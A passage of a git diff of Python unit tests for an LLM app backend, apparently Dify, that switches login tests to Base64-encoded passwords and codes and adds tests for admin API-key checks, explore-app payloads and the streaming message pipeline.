"test@example.com", "code": encode_code("wrong_code"), "token": "token"}, ): api = EmailCodeLoginApi() with pytest.raises(EmailCodeError): @@ -497,7 +508,7 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "test@example.com", "code": "123456", "token": "token"}, + json={"email": "test@example.com", "code": encode_code("123456"), "token": "token"}, ): api = EmailCodeLoginApi() with pytest.raises(WorkspacesLimitExceeded): @@ -539,7 +550,7 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "test@example.com", "code": "123456", "token": "token"}, + json={"email": "test@example.com", "code": encode_code("123456"), "token": "token"}, ): api = EmailCodeLoginApi() with pytest.raises(NotAllowedCreateWorkspace): diff --git a/api/tests/unit_tests/controllers/console/auth/test_login_logout.py b/api/tests/unit_tests/controllers/console/auth/test_login_logout.py index 8799d6484d..3a2cf7bad7 100644 --- a/api/tests/unit_tests/controllers/console/auth/test_login_logout.py +++ b/api/tests/unit_tests/controllers/console/auth/test_login_logout.py @@ -8,6 +8,7 @@ This module tests the core authentication endpoints including: - Account status validation """ +import base64 from unittest.mock import MagicMock, patch import pytest @@ -28,6 +29,11 @@ from controllers.console.error import ( from services.errors.account import AccountLoginError, AccountPasswordError +def encode_password(password: str) -> str: + """Helper to encode password as Base64 for testing.""" + return base64.b64encode(password.encode("utf-8")).decode() + + class TestLoginApi: """Test cases for the LoginApi endpoint.""" @@ -106,7 +112,9 @@ class TestLoginApi: # Act with app.test_request_context( - "/login", method="POST", json={"email": "test@example.com", "password": "ValidPass123!"} + "/login", + method="POST", + json={"email": "test@example.com", "password": encode_password("ValidPass123!")}, ): login_api = LoginApi() response = login_api.post() @@ -158,7 +166,11 @@ class TestLoginApi: with app.test_request_context( "/login", method="POST", - json={"email": "test@example.com", "password": "ValidPass123!", "invite_token": "valid_token"}, + json={ + "email": "test@example.com", + "password": encode_password("ValidPass123!"), + "invite_token": "valid_token", + }, ): login_api = LoginApi() response = login_api.post() @@ -186,7 +198,7 @@ class TestLoginApi: # Act & Assert with app.test_request_context( - "/login", method="POST", json={"email": "test@example.com", "password": "password"} + "/login", method="POST", json={"email": "test@example.com", "password": encode_password("password")} ): login_api = LoginApi() with pytest.raises(EmailPasswordLoginLimitError): @@ -209,7 +221,7 @@ class TestLoginApi: # Act & Assert with app.test_request_context( - "/login", method="POST", json={"email": "frozen@example.com", "password": "password"} + "/login", method="POST", json={"email": "frozen@example.com", "password": encode_password("password")} ): login_api = LoginApi() with pytest.raises(AccountInFreezeError): @@ -246,7 +258,7 @@ class TestLoginApi: # Act & Assert with app.test_request_context( - "/login", method="POST", json={"email": "test@example.com", "password": "WrongPass123!"} + "/login", method="POST", json={"email": "test@example.com", "password": encode_password("WrongPass123!")} ): login_api = LoginApi() with pytest.raises(AuthenticationFailedError): @@ -277,7 +289,7 @@ class TestLoginApi: # Act & Assert with app.test_request_context( - "/login", method="POST", json={"email": "banned@example.com", "password": "ValidPass123!"} + "/login", method="POST", json={"email": "banned@example.com", "password": encode_password("ValidPass123!")} ): login_api = LoginApi() with pytest.raises(AccountBannedError): @@ -322,7 +334,7 @@ class TestLoginApi: # Act & Assert with app.test_request_context( - "/login", method="POST", json={"email": "test@example.com", "password": "ValidPass123!"} + "/login", method="POST", json={"email": "test@example.com", "password": encode_password("ValidPass123!")} ): login_api = LoginApi() with pytest.raises(WorkspacesLimitExceeded): @@ -349,7 +361,11 @@ class TestLoginApi: with app.test_request_context( "/login", method="POST", - json={"email": "different@example.com", "password": "ValidPass123!", "invite_token": "token"}, + json={ + "email": "different@example.com", + "password": encode_password("ValidPass123!"), + "invite_token": "token", + }, ): login_api = LoginApi() with pytest.raises(InvalidEmailError): diff --git a/api/tests/unit_tests/controllers/console/test_admin.py b/api/tests/unit_tests/controllers/console/test_admin.py new file mode 100644 index 0000000000..e0ddf6542e --- /dev/null +++ b/api/tests/unit_tests/controllers/console/test_admin.py @@ -0,0 +1,407 @@ +"""Final working unit tests for admin endpoints - tests business logic directly.""" + +import uuid +from unittest.mock import Mock, patch + +import pytest +from werkzeug.exceptions import NotFound, Unauthorized + +from controllers.console.admin import InsertExploreAppPayload +from models.model import App, RecommendedApp + + +class TestInsertExploreAppPayload: + """Test InsertExploreAppPayload validation.""" + + def test_valid_payload(self): + """Test creating payload with valid data.""" + payload_data = { + "app_id": str(uuid.uuid4()), + "desc": "Test app description", + "copyright": "© 2024 Test Company", + "privacy_policy": "https://example.com/privacy", + "custom_disclaimer": "Custom disclaimer text", + "language": "en-US", + "category": "Productivity", + "position": 1, + } + + payload = InsertExploreAppPayload.model_validate(payload_data) + + assert payload.app_id == payload_data["app_id"] + assert payload.desc == payload_data["desc"] + assert payload.copyright == payload_data["copyright"] + assert payload.privacy_policy == payload_data["privacy_policy"] + assert payload.custom_disclaimer == payload_data["custom_disclaimer"] + assert payload.language == payload_data["language"] + assert payload.category == payload_data["category"] + assert payload.position == payload_data["position"] + + def test_minimal_payload(self): + """Test creating payload with only required fields.""" + payload_data = { + "app_id": str(uuid.uuid4()), + "language": "en-US", + "category": "Productivity", + "position": 1, + } + + payload = InsertExploreAppPayload.model_validate(payload_data) + + assert payload.app_id == payload_data["app_id"] + assert payload.desc is None + assert payload.copyright is None + assert payload.privacy_policy is None + assert payload.custom_disclaimer is None + assert payload.language == payload_data["language"] + assert payload.category == payload_data["category"] + assert payload.position == payload_data["position"] + + def test_invalid_language(self): + """Test payload with invalid language code.""" + payload_data = { + "app_id": str(uuid.uuid4()), + "language": "invalid-lang", + "category": "Productivity", + "position": 1, + } + + with pytest.raises(ValueError, match="invalid-lang is not a valid language"): + InsertExploreAppPayload.model_validate(payload_data) + + +class TestAdminRequiredDecorator: + """Test admin_required decorator.""" + + def setup_method(self): + """Set up test fixtures.""" + # Mock dify_config + self.dify_config_patcher = patch("controllers.console.admin.dify_config") + self.mock_dify_config = self.dify_config_patcher.start() + self.mock_dify_config.ADMIN_API_KEY = "test-admin-key" + + # Mock extract_access_token + self.token_patcher = patch("controllers.console.admin.extract_access_token") + self.mock_extract_token = self.token_patcher.start() + + def teardown_method(self): + """Clean up test fixtures.""" + self.dify_config_patcher.stop() + self.token_patcher.stop() + + def test_admin_required_success(self): + """Test successful admin authentication.""" + from controllers.console.admin import admin_required + + @admin_required + def test_view(): + return {"success": True} + + self.mock_extract_token.return_value = "test-admin-key" + result = test_view() + assert result["success"] is True + + def test_admin_required_invalid_token(self): + """Test admin_required with invalid token.""" + from controllers.console.admin import admin_required + + @admin_required + def test_view(): + return {"success": True} + + self.mock_extract_token.return_value = "wrong-key" + with pytest.raises(Unauthorized, match="API key is invalid"): + test_view() + + def test_admin_required_no_api_key_configured(self): + """Test admin_required when no API key is configured.""" + from controllers.console.admin import admin_required + + self.mock_dify_config.ADMIN_API_KEY = None + + @admin_required + def test_view(): + return {"success": True} + + with pytest.raises(Unauthorized, match="API key is invalid"): + test_view() + + def test_admin_required_missing_authorization_header(self): + """Test admin_required with missing authorization header.""" + from controllers.console.admin import admin_required + + @admin_required + def test_view(): + return {"success": True} + + self.mock_extract_token.return_value = None + with pytest.raises(Unauthorized, match="Authorization header is missing"): + test_view() + + +class TestExploreAppBusinessLogicDirect: + """Test the core business logic of explore app management directly.""" + + def test_data_fusion_logic(self): + """Test the data fusion logic between payload and site data.""" + # Test cases for different data scenarios + test_cases = [ + { + "name": "site_data_overrides_payload", + "payload": {"desc": "Payload desc", "copyright": "Payload copyright"}, + "site": {"description": "Site desc", "copyright": "Site copyright"}, + "expected": { + "desc": "Site desc", + "copyright": "Site copyright", + "privacy_policy": "", + "custom_disclaimer": "", + }, + }, + { + "name": "payload_used_when_no_site", + "payload": {"desc": "Payload desc", "copyright": "Payload copyright"}, + "site": None, + "expected": { + "desc": "Payload desc", + "copyright": "Payload copyright", + "privacy_policy": "", + "custom_disclaimer": "", + }, + }, + { + "name": "empty_defaults_when_no_data", + "payload": {}, + "site": None, + "expected": {"desc": "", "copyright": "", "privacy_policy": "", "custom_disclaimer": ""}, + }, + ] + + for case in test_cases: + # Simulate the data fusion logic + payload_desc = case["payload"].get("desc") + payload_copyright = case["payload"].get("copyright") + payload_privacy_policy = case["payload"].get("privacy_policy") + payload_custom_disclaimer = case["payload"].get("custom_disclaimer") + + if case["site"]: + site_desc = case["site"].get("description") + site_copyright = case["site"].get("copyright") + site_privacy_policy = case["site"].get("privacy_policy") + site_custom_disclaimer = case["site"].get("custom_disclaimer") + + # Site data takes precedence + desc = site_desc or payload_desc or "" + copyright = site_copyright or payload_copyright or "" + privacy_policy = site_privacy_policy or payload_privacy_policy or "" + custom_disclaimer = site_custom_disclaimer or payload_custom_disclaimer or "" + else: + # Use payload data or empty defaults + desc = payload_desc or "" + copyright = payload_copyright or "" + privacy_policy = payload_privacy_policy or "" + custom_disclaimer = payload_custom_disclaimer or "" + + result = { + "desc": desc, + "copyright": copyright, + "privacy_policy": privacy_policy, + "custom_disclaimer": custom_disclaimer, + } + + assert result == case["expected"], f"Failed test case: {case['name']}" + + def test_app_visibility_logic(self): + """Test that apps are made public when added to explore list.""" + # Create a mock app + mock_app = Mock(spec=App) + mock_app.is_public = False + + # Simulate the business logic + mock_app.is_public = True + + assert mock_app.is_public is True + + def test_recommended_app_creation_logic(self): + """Test the creation of RecommendedApp objects.""" + app_id = str(uuid.uuid4()) + payload_data = { + "app_id": app_id, + "desc": "Test app description", + "copyright": "© 2024 Test Company", + "privacy_policy": "https://example.com/privacy", + "custom_disclaimer": "Custom disclaimer", + "language": "en-US", + "category": "Productivity", + "position": 1, + } + + # Simulate the creation logic + recommended_app = Mock(spec=RecommendedApp) + recommended_app.app_id = payload_data["app_id"] + recommended_app.description = payload_data["desc"] + recommended_app.copyright = payload_data["copyright"] + recommended_app.privacy_policy = payload_data["privacy_policy"] + recommended_app.custom_disclaimer = payload_data["custom_disclaimer"] + recommended_app.language = payload_data["language"] + recommended_app.category = payload_data["category"] + recommended_app.position = payload_data["position"] + + # Verify the data + assert recommended_app.app_id == app_id + assert recommended_app.description == "Test app description" + assert recommended_app.copyright == "© 2024 Test Company" + assert recommended_app.privacy_policy == "https://example.com/privacy" + assert recommended_app.custom_disclaimer == "Custom disclaimer" + assert recommended_app.language == "en-US" + assert recommended_app.category == "Productivity" + assert recommended_app.position == 1 + + def test_recommended_app_update_logic(self): + """Test the update logic for existing RecommendedApp objects.""" + mock_recommended_app = Mock(spec=RecommendedApp) + + update_data = { + "desc": "Updated description", + "copyright": "© 2024 Updated", + "language": "fr-FR", + "category": "Tools", + "position": 2, + } + + # Simulate the update logic + mock_recommended_app.description = update_data["desc"] + mock_recommended_app.copyright = update_data["copyright"] + mock_recommended_app.language = update_data["language"] + mock_recommended_app.category = update_data["category"] + mock_recommended_app.position = update_data["position"] + + # Verify the updates + assert mock_recommended_app.description == "Updated description" + assert mock_recommended_app.copyright == "© 2024 Updated" + assert mock_recommended_app.language == "fr-FR" + assert mock_recommended_app.category == "Tools" + assert mock_recommended_app.position == 2 + + def test_app_not_found_error_logic(self): + """Test error handling when app is not found.""" + app_id = str(uuid.uuid4()) + + # Simulate app lookup returning None + found_app = None + + # Test the error condition + if not found_app: + with pytest.raises(NotFound, match=f"App '{app_id}' is not found"): + raise NotFound(f"App '{app_id}' is not found") + + def test_recommended_app_not_found_error_logic(self): + """Test error handling when recommended app is not found for deletion.""" + app_id = str(uuid.uuid4()) + + # Simulate recommended app lookup returning None + found_recommended_app = None + + # Test the error condition + if not found_recommended_app: + with pytest.raises(NotFound, match=f"App '{app_id}' is not found in the explore list"): + raise NotFound(f"App '{app_id}' is not found in the explore list") + + def test_database_session_usage_patterns(self): + """Test the expected database session usage patterns.""" + # Mock session usage patterns + mock_session = Mock() + + # Test session.add pattern + mock_recommended_app = Mock(spec=RecommendedApp) + mock_session.add(mock_recommended_app) + mock_session.commit() + + # Verify session was used correctly + mock_session.add.assert_called_once_with(mock_recommended_app) + mock_session.commit.assert_called_once() + + # Test session.delete pattern + mock_recommended_app_to_delete = Mock(spec=RecommendedApp) + mock_session.delete(mock_recommended_app_to_delete) + mock_session.commit() + + # Verify delete pattern + mock_session.delete.assert_called_once_with(mock_recommended_app_to_delete) + + def test_payload_validation_integration(self): + """Test payload validation in the context of the business logic.""" + # Test valid payload + valid_payload_data = { + "app_id": str(uuid.uuid4()), + "desc": "Test app description", + "language": "en-US", + "category": "Productivity", + "position": 1, + } + + # This should succeed + payload = InsertExploreAppPayload.model_validate(valid_payload_data) + assert payload.app_id == valid_payload_data["app_id"] + + # Test invalid payload + invalid_payload_data = { + "app_id": str(uuid.uuid4()), + "language": "invalid-lang", # This should fail validation + "category": "Productivity", + "position": 1, + } + + # This should raise an exception + with pytest.raises(ValueError, match="invalid-lang is not a valid language"): + InsertExploreAppPayload.model_validate(invalid_payload_data) + + +class TestExploreAppDataHandling: + """Test specific data handling scenarios.""" + + def test_uuid_validation(self): + """Test UUID validation and handling.""" + # Test valid UUID + valid_uuid = str(uuid.uuid4()) + + # This should be a valid UUID + assert uuid.UUID(valid_uuid) is not None + + # Test invalid UUID + invalid_uuid = "not-a-valid-uuid" + + # This should raise a ValueError + with pytest.raises(ValueError): + uuid.UUID(invalid_uuid) + + def test_language_validation(self): + """Test language validation against supported languages.""" + from constants.languages import supported_language + + # Test supported language + assert supported_language("en-US") == "en-US" + assert supported_language("fr-FR") == "fr-FR" + + # Test unsupported language + with pytest.raises(ValueError, match="invalid-lang is not a valid language"): + supported_language("invalid-lang") + + def test_response_formatting(self): + """Test API response formatting.""" + # Test success responses + create_response = {"result": "success"} + update_response = {"result": "success"} + delete_response = None # 204 No Content returns None + + assert create_response["result"] == "success" + assert update_response["result"] == "success" + assert delete_response is None + + # Test status codes + create_status = 201 # Created + update_status = 200 # OK + delete_status = 204 # No Content + + assert create_status == 201 + assert update_status == 200 + assert delete_status == 204 diff --git a/api/tests/unit_tests/core/app/task_pipeline/test_easy_ui_based_generate_task_pipeline.py b/api/tests/unit_tests/core/app/task_pipeline/test_easy_ui_based_generate_task_pipeline.py new file mode 100644 index 0000000000..40f58c9ddf --- /dev/null +++ b/api/tests/unit_tests/core/app/task_pipeline/test_easy_ui_based_generate_task_pipeline.py @@ -0,0 +1,420 @@ +from types import SimpleNamespace +from unittest.mock import ANY, Mock, patch + +import pytest + +from core.app.apps.base_app_queue_manager import AppQueueManager +from core.app.entities.app_invoke_entities import ChatAppGenerateEntity +from core.app.entities.queue_entities import ( + QueueAgentMessageEvent, + QueueErrorEvent, + QueueLLMChunkEvent, + QueueMessageEndEvent, + QueueMessageFileEvent, + QueuePingEvent, +) +from core.app.entities.task_entities import ( + EasyUITaskState, + ErrorStreamResponse, + MessageEndStreamResponse, + MessageFileStreamResponse, + MessageReplaceStreamResponse, + MessageStreamResponse, + PingStreamResponse, + StreamEvent, +) +from core.app.task_pipeline.easy_ui_based_generate_task_pipeline import EasyUIBasedGenerateTaskPipeline +from core.base.tts import AppGeneratorTTSPublisher +from core.model_runtime.entities.llm_entities import LLMResult as RuntimeLLMResult +from core.model_runtime.entities.message_entities import TextPromptMessageContent +from core.ops.ops_trace_manager import TraceQueueManager +from models.model import AppMode + + +class TestEasyUIBasedGenerateTaskPipelineProcessStreamResponse: + """Test cases for EasyUIBasedGenerateTaskPipeline._process_stream_response method.""" + + @pytest.fixture + def mock_application_generate_entity(self): + """Create a mock application generate entity.""" + entity = Mock(spec=ChatAppGenerateEntity) + entity.task_id = "test-task-id" + entity.app_id = "test-app-id" + # minimal app_config used by pipeline internals + entity.app_config = SimpleNamespace( + tenant_id="test-tenant-id", + app_id="test-app-id", + app_mode=AppMode.CHAT, + app_model_config_dict={}, + additional_features=None, + sensitive_word_avoidance=None, + ) + # minimal model_conf for LLMResult init + entity.model_conf = SimpleNamespace( + model="test-model", + provider_model_bundle=SimpleNamespace(model_type_instance=Mock()), + credentials={}, + ) + return entity + + @pytest.fixture + def mock_queue_manager(self): + """Create a mock queue manager.""" + manager = Mock(spec=AppQueueManager) + return manager + + @pytest.fixture + def mock_message_cycle_manager(self): + """Create a mock message cycle manager.""" + manager = Mock() + manager.get_message_event_type.return_value = StreamEvent.MESSAGE + manager.message_to_stream_response.return_value = Mock(spec=MessageStreamResponse) + manager.message_file_to_stream_response.return_value = Mock(spec=MessageFileStreamResponse) + manager.message_replace_to_stream_response.return_value = Mock(spec=MessageReplaceStreamResponse) + manager.handle_retriever_resources = Mock() + manager.handle_annotation_reply.return_value = None + return manager + + @pytest.fixture + def mock_conversation(self): + """Create a mock conversation.""" + conversation = Mock() + conversation.id = "test-conversation-id" + conversation.mode = "chat" + return conversation + + @pytest.fixture + def mock_message(self): + """Create a mock message.""" + message = Mock() + message.id = "test-message-id" + message.created_at = Mock() + message.created_at.timestamp.return_value = 1234567890 + return message + + @pytest.fixture + def mock_task_state(self): + """Create a mock task state.""" + task_state = Mock(spec=EasyUITaskState) + + # Create LLM result mock + llm_result = Mock(spec=RuntimeLLMResult) + llm_result.prompt_messages = [] + llm_result.message = Mock() + llm_result.message.content = "" + + task_state.llm_result = llm_result + task_state.answer = "" + + return task_state + + @pytest.fixture + def pipeline( + self, + mock_application_generate_entity, + mock_queue_manager, + mock_conversation, + mock_message, + mock_message_cycle_manager, + mock_task_state, + ): + """Create an EasyUIBasedGenerateTaskPipeline instance with mocked dependencies.""" + with patch( + "core.app.task_pipeline.easy_ui_based_generate_task_pipeline.EasyUITaskState", return_value=mock_task_state + ): + pipeline = EasyUIBasedGenerateTaskPipeline( + application_generate_entity=mock_application_generate_entity, + queue_manager=mock_queue_manager, + conversation=mock_conversation, + message=mock_message, + stream=True, + ) + pipeline._message_cycle_manager = mock_message_cycle_manager + pipeline._task_state = mock_task_state + return pipeline + + def test_get_message_event_type_called_once_when_first_llm_chunk_arrives( + self, pipeline, mock_message_cycle_manager + ): + """Expect get_message_event_type to be called when processing the first LLM chunk event.""" + # Setup a minimal LLM chunk event + chunk = Mock() + chunk.delta.message.content = "hi" + chunk.prompt_messages = [] + llm_chunk_event = Mock(spec=QueueLLMChunkEvent) + llm_chunk_event.chunk = chunk + mock_queue_message = Mock() + mock_queue_message.event = llm_chunk_event + pipeline.queue_manager.listen.return_value = [mock_queue_message] + + # Execute + list(pipeline._process_stream_response(publisher=None, trace_manager=None)) + + # Assert + mock_message_cycle_manager.get_message_event_type.assert_called_once_with(message_id="test-message-id") + + def test_llm_chunk_event_with_text_content(self, pipeline, mock_message_cycle_manager, mock_task_state): + """Test handling of LLM chunk events with text content.""" + # Setup + chunk = Mock() + chunk.delta.message.content = "Hello, world!" + chunk.prompt_messages = [] + + llm_chunk_event = Mock(spec=QueueLLMChunkEvent) + llm_chunk_event.chunk = chunk + + mock_queue_message = Mock() + mock_queue_message.event = llm_chunk_event + pipeline.queue_manager.listen.return_value = [mock_queue_message] + + mock_message_cycle_manager.get_message_event_type.return_value = StreamEvent.MESSAGE + + # Execute + responses = list(pipeline._process_stream_response(publisher=None, trace_manager=None)) + + # Assert + assert len(responses) == 1 + mock_message_cycle_manager.message_to_stream_response.assert_called_once_with( + answer="Hello, world!", message_id="test-message-id", event_type=StreamEvent.MESSAGE + ) + assert mock_task_state.llm_result.message.content == "Hello, world!" + + def test_llm_chunk_event_with_list_content(self, pipeline, mock_message_cycle_manager, mock_task_state): + """Test handling of LLM chunk events with list content.""" + # Setup + text_content = Mock(spec=TextPromptMessageContent) + text_content.data = "Hello" + + chunk = Mock() + chunk.delta.message.content = [text_content, " world!"] + chunk.prompt_messages = [] + + llm_chunk_event = Mock(spec=QueueLLMChunkEvent) + llm_chunk_event.chunk = chunk + + mock_queue_message = Mock() + mock_queue_message.event = llm_chunk_event + pipeline.queue_manager.listen.return_value = [mock_queue_message] + + mock_message_cycle_manager.get_message_event_type.return_value = StreamEvent.MESSAGE + + # Execute + responses = list(pipeline._process_stream_response(publisher=None, trace_manager=None)) + + # Assert + assert len(responses) == 1 + mock_message_cycle_manager.message_to_stream_response.assert_called_once_with( + answer="Hello world!", message_id="test-message-id", event_type=StreamEvent.MESSAGE + ) + assert mock_task_state.llm_result.message.content == "Hello world!" + + def test_agent_message_event(self, pipeline, mock_message_cycle_manager, mock_task_state): + """Test handling of agent message events.""" + # Setup + chunk = Mock() + chunk.delta.message.content = "Agent response" + + agent_message_event = Mock(spec=QueueAgentMessageEvent) + agent_message_event.chunk = chunk + + mock_queue_message = Mock() + mock_queue_message.event = agent_message_event + pipeline.queue_manager.listen.return_value = [mock_queue_message] + + # Ensure method under assertion is a mock to track calls + pipeline._agent_message_to_stream_response = Mock(return_value=Mock()) + + # Execute + responses = list(pipeline._process_stream_response(publisher=None, trace_manager=None)) + + # Assert + assert len(responses) == 1 + # Agent messages should use _agent_message_to_stream_response + pipeline._agent_message_to_stream_response.assert_called_once_with( + answer="Agent response", message_id="test-message-id" + ) + + def test_message_end_event(self, pipeline, mock_message_cycle_manager, mock_task_state): + """Test handling of message end events.""" + # Setup + llm_result = Mock(spec=RuntimeLLMResult) + llm_result.message = Mock() + llm_result.message.content = "Final response" + + message_end_event = Mock(spec=QueueMessageEndEvent) + message_end_event.llm_result = llm_result + + mock_queue_message = Mock() + mock_queue_message.event = message_end_event + pipeline.queue_manager.listen.return_value = [mock_queue_message] + + pipeline._save_message = Mock() + pipeline._message_end_to_stream_response = Mock(return_value=Mock(spec=MessageEndStreamResponse)) + + # Patch db.engine used inside pipeline for session creation + with patch( + "core.app.task_pipeline.easy_ui_based_generate_task_pipeline.db", new=SimpleNamespace(engine=Mock()) + ): + # Execute + responses = list(pipeline._process_stream_response(publisher=None, trace_manager=None)) + + # Assert + assert len(responses) == 1 + assert mock_task_state.llm_result == llm_result + pipeline._save_message.assert_called_once() + pipeline._message_end_to_stream_response.assert_called_once() + + def test_error_event(self, pipeline): + """Test handling of error events.""" + # Setup + error_event = Mock(spec=QueueErrorEvent) + error_event.error = Exception("Test error") + + mock_queue_message = Mock() + mock_queue_message.event = error_event + pipeline.queue_manager.listen.return_value = [mock_queue_message] + + pipeline.handle_error = Mock(return_value=Exception("Test error")) + pipeline.error_to_stream_response = Mock(return_value=Mock(spec=ErrorStreamResponse)) + + # Patch db.engine used inside pipeline for session creation + with patch( + "core.app.task_pipeline.easy_ui_based_generate_task_pipeline.db", new=SimpleNamespace(engine=Mock()) + ): + # Execute + responses = list(pipeline._process_stream_response(publisher=None, trace_manager=None)) + + # Assert + assert len(responses) == 1 + pipeline.handle_error.assert_called_once() + pipeline.error_to_stream_response.assert_called_once() + + def test_ping_event(self, pipeline): + """Test handling of ping events.""" + # Setup + ping_event = Mock(spec=QueuePingEvent) + + mock_queue_message = Mock() + mock_queue_message.event = ping_event + pipeline.queue_manager.listen.return_value = [mock_queue_message] + + pipeline.ping_stream_response = Mock(return_value=Mock(spec=PingStreamResponse)) + + # Execute + responses = list(pipeline._process_stream_response(publisher=None, trace_manager=None)) + + # Assert + assert len(responses) == 1 + pipeline.ping_stream_response.assert_called_once() + + def test_file_event(self, pipeline, mock_message_cycle_manager): + """Test handling of file events.""" + # Setup + file_event = Mock(spec=QueueMessageFileEvent) + file_event.message_file_id = "file-id" + + mock_queue_message = Mock() + mock_queue_message.event = file_event + pipeline.queue_manager.listen.return_value = [mock_queue_message] + + file_response = Mock(spec=MessageFileStreamResponse) + mock_message_cycle_manager.message_file_to_stream_response.return_value = file_response + + # Execute + responses = list(pipeline._process_stream_response(publisher=None, trace_manager=None)) + + # Assert + assert len(responses) == 1 + assert responses[0] == file_response + mock_message_cycle_manager.message_file_to_stream_response.assert_called_once_with(file_event) + + def test_publisher_is_called_with_messages(self, pipeline): + """Test that publisher publishes messages when provided.""" + # Setup + publisher = Mock(spec=AppGeneratorTTSPublisher) + + ping_event = Mock(spec=QueuePingEvent) + mock_queue_message = Mock() + mock_queue_message.event = ping_event + pipeline.queue_manager.listen.return_value = [mock_queue_message] + + pipeline.ping_stream_response = Mock(return_value=Mock(spec=PingStreamResponse)) + + # Execute + list(pipeline._process_stream_response(publisher=publisher, trace_manager=None)) + + # Assert + # Called once with message and once with None at the end + assert publisher.publish.call_count == 2 + publisher.publish.assert_any_call(mock_queue_message) + publisher.publish.assert_any_call(None) + + def test_trace_manager_passed_to_save_message(self, pipeline): + """Test that trace manager is passed to _save_message.""" + # Setup + trace_manager = Mock(spec=TraceQueueManager) + + message_end_event = Mock(spec=QueueMessageEndEvent) + message_end_event.llm_result = None + + mock_queue_message = Mock() + mock_queue_message.event = message_end_event + pipeline.queue_manager.listen.return_value = [mock_queue_message] + + pipeline._save_message = Mock() + pipeline._message_end_to_stream_response = Mock(return_value=Mock(spec=MessageEndStreamResponse)) + + # Patch db.engine used inside pipeline for session creation + with patch( + "core.app.task_pipeline.easy_ui_based_generate_task_pipeline.db", new=SimpleNamespace(engine=Mock()) + ): + # Execute + list(pipeline._process_stream_response(publisher=None, trace_manager=trace_manager)) + + # Assert + pipeline._save_message.assert_called_once_with(session=ANY, trace_manager=trace_manager) + + def test_multiple_events_sequence(self, pipeline, mock_message_cycle_manager, mock_task_state): + """Test handling multiple events in sequence.""" + # Setup + chunk1 = Mock() + chunk1.delta.message.content = "Hello" + chunk1.prompt_messages = [] + + chunk2 = Mock() + chunk2.delta.message.content = " world!" + chunk2.prompt_messages = [] + + llm_chunk_event1 = Mock(spec=QueueLLMChunkEvent) + llm_chunk_event1.chunk = chunk1 + + ping_event = Mock(spec=QueuePingEvent) + + llm_chunk_event2 = Mock(spec=QueueLLMChunkEvent) + llm_chunk_event2.chunk = chunk2 + + mock_queue_messages = [ + Mock(event=llm_chunk_event1), + Mock(event=ping_event), + Mock(event=llm_chunk_event2), + ] + pipeline.queue_manager.listen.return_value = mock_queue_messages + + mock_message_cycle_manager.get_message_event_type.return_value = StreamEvent.MESSAGE + pipeline.ping_stream_response = Mock(return_value=Mock(spec=PingStreamResponse)) + + # Execute + responses = list(pipeline._process_stream_response(publisher=None, trace_manager=None)) + + # Assert + assert len(responses) == 3 + assert mock_task_state.llm_result.message.content == "Hello world!" + + # Verify calls to message_to_stream_response + assert mock_message_cycle_manager.message_to_stream_response.call_count == 2 + mock_message_cycle_manager.message_to_stream_response.assert_any_call( + answer="Hello", message_id="test-message-id", event_type=StreamEvent.MESSAGE + ) + mock_message_cycle_manager.message_to_stream_response.assert_any_call( + answer=" world!", message_id="test-message-id", event_type=StreamEvent.MESSAGE + ) diff --git a/api/tests/unit_tests/core/app/task_pipeline/test_message_cycle_manager_optimization.py b/api/tests/unit_tests/core/app/task_pipeline/test_message_cycle_manager_optimization.py new file mode 100644 index 0000000000..5ef7f0d7f4 --- /dev/null +++ b/api/tests/unit_tests/core/app/task_pipeline/test_message_cycle_manager_optimization.py @@ -0,0 +1,166 @@ +"""Unit tests for the message cycle manager optimization.""" + +from types import SimpleNamespace +from unittest.mock import ANY, Mock, patch + +import pytest +from flask import current_app + +from core.app.entities.task_entities import MessageStreamResponse, StreamEvent +from core.app.task_pipeline.message_cycle_manager import MessageCycleManager + + +class TestMessageCycleManagerOptimization: + """Test cases for the message cycle manager optimization that prevents N+1 queries.""" + + @pytest.fixture + def mock_application_generate_entity(self): + """Create a mock application generate entity.""" + entity = Mock() + entity.task_id = "test-task-id" + return entity + + @pytest.fixture + def message_cycle_manager(self, mock_application_generate_entity): + """Create a message cycle manager instance.""" + task_state = Mock() + return MessageCycleManager(application_generate_entity=mock_application_generate_entity, task_state=task_state) + + def test_get_message_event_type_with_message_file(self, message_cycle_manager): + """Test get_message_event_type returns MESSAGE_FILE when message has files.""" + with ( + patch("core.app.task_pipeline.message_cycle_manager.Session") as mock_session_class, + patch("core.app.task_pipeline.message_cycle_manager.db", new=SimpleNamespace(engine=Mock())), + ): + # Setup mock session and message file + mock_session = Mock() + mock_session_class.return_value.__enter__.return_value = mock_session + + mock_message_file = Mock() + # Current implementation uses session.query(...).scalar() + mock_session.query.return_value.scalar.return_value = mock_message_file + + # Execute + with current_app.app_context(): + result = message_cycle_manager.get_message_event_type("test-message-id") + + # Assert + assert result == StreamEvent.MESSAGE_FILE + mock_session.query.return_value.scalar.assert_called_once() + + def test_get_message_event_type_without_message_file(self, message_cycle_manager): + """Test get_message_event_type returns MESSAGE when message has no files.""" + with ( + patch("core.app.task_pipeline.message_cycle_manager.Session") as mock_session_class, + patch("core.app.task_pipeline.message_cycle_manager.db", new=SimpleNamespace(engine=Mock())), + ): + # Setup mock session and no message file + mock_session = Mock() + mock_session_class.return_value.__enter__.return_value = mock_session + # Current implementation uses session.query(...).scalar() + mock_session.query.return_value.scalar.return_value = None + + # Execute + with current_app.app_context(): + result = message_cycle_manager.get_message_event_type("test-message-id") + + # Assert + assert result == StreamEvent.MESSAGE + mock_session.query.return_value.scalar.assert_called_once() + + def test_message_to_stream_response_with_precomputed_event_type(self, message_cycle_manager): + """MessageCycleManager.message_to_stream_response expects a valid event_type; callers should precompute it.""" + with ( + patch("core.app.task_pipeline.message_cycle_manager.Session") as mock_session_class, + patch("core.app.task_pipeline.message_cycle_manager.db", new=SimpleNamespace(engine=Mock())), + ): + # Setup mock session and message file + mock_session = Mock() + mock_session_class.return_value.__enter__.return_value = mock_session + + mock_message_file = Mock() + # Current implementation uses session.query(...).scalar() + mock_session.query.return_value.scalar.return_value = mock_message_file + + # Execute: compute event type once, then pass to message_to_stream_response + with current_app.app_context(): + event_type = message_cycle_manager.get_message_event_type("test-message-id") + result = message_cycle_manager.message_to_stream_response( + answer="Hello world", message_id="test-message-id", event_type=event_type + ) + + # Assert + assert isinstance(result, MessageStreamResponse) + assert result.answer == "Hello world" + assert result.id == "test-message-id" + assert result.event == StreamEvent.MESSAGE_FILE + mock_session.query.return_value.scalar.assert_called_once() + + def test_message_to_stream_response_with_event_type_skips_query(self, 